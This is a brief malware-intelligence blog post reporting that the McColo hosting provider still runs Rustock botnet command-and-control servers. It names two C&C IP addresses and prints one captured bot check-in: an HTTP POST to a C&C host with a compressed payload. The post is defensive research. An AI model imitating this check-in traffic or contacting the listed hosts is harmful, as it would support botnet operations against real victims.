Blog

McColo (still) hosting Rustock C&C

A month ago we wrote that McColo was hosting a Rustock Command and Control server on 208.72.168.191.  I wish I could report that Hurricane Electric or Global Crossing, their two upstream providers, had stopped routing these clowns, but unfortunately, that is not the case.

Closing out today’s day-in-the-life-of-McColo, I took a look at our Rustock bot lab, and I saw one communicating today on 208.66.194.22, another McColo IP address.  A google search turns up a whopping 3 matches for that IP, one of which is ThreatExpert.  A quick aside – The TE team really have their act together, and IMHO, don’t receive nearly enough credit for their infrastructure.

A Rustock transaction looks like this:

POST /data.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: 208.66.194.22
Content-Type: multipart/form-data
Content-Encoding: gzip
Content-Length: 135
Connection: Close
Pragma: no-cache

…A1y1v.A.X….JQ.f.(….m^.$1.2..1?.a2B..J.>f3a.&..2.YE….XX=.;…a.
i.n8..10NA.bb…………..=.>a.b#..,..k..OPM…y.~.ku..5…AAf:14.RT..

As I was poking at this C&C server, I realized there was a ridiculously small amount of latency between my lab and McColo, as in, <10ms.  Google says their that Both he.net and GBLX have an office on Market Street, in San Jose, right down the road from FireEye.  Thanks to Street View, you can see a photo of it below:

View Larger Map

Alex Lanstein @ FireEye Malware Intelligence Labs
Comments/Questions to fgong@fireeye.com